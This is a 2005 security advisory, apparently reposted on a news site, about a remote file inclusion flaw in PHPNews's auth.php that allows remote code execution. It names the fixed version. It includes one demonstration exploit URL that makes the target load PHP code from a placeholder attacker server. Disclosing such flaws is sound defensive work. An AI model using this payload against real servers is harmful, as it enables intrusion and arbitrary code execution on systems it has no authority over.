Previous articleBack to news listNext article
|
Sponsored links |
Want to become one of our authors and see your work published on ALLSeek.iNFO ?
|
| PHPNews 'auth.php' Include File Flaw Lets Remote Users Execute Arbitrary Code |
|---|
Categorie: Vulnerability
Posted: 2005-03-03 by ReCall
Views: 429
Source: Click here
| Current Rating: Not rated
|
|
| Details |
|---|
Description: An include file vulnerability was reported in PHPNews. A remote user can execute arbitrary commands on the target system.
The 'auth.php' script does not properly validate the user-supplied path variable. A remote user can supply a specially crafted URL to cause the script to include and execute PHP code from a remote location.
If register_globals and allow_url_fopen are set to 'on', this flaw can be exploited.
A demonstration exploit URL that will execute the 'en_GB.admin.lng' or 'admin.lng' file from the attacker's server is provided:
http://[target]/[dir]/auth.php?path=http://[attacker]/
Filip Groszynski reported this vulnerability. credit:Filip Groszynski reported this vulnerability.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system. The code will run with the privileges of the target web service.
Solution: The vendor has released a fixed version (1.2.5), available at:
http://newsphp.sourceforge.net/downloads.php
|
| Syndication |
|---|
Permalink Email this
The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=1404
|
| User comments (post your comments ) |
|---|
Only registerd members can post comments and articles
|
|
Previous articleBack to news listNext article
|
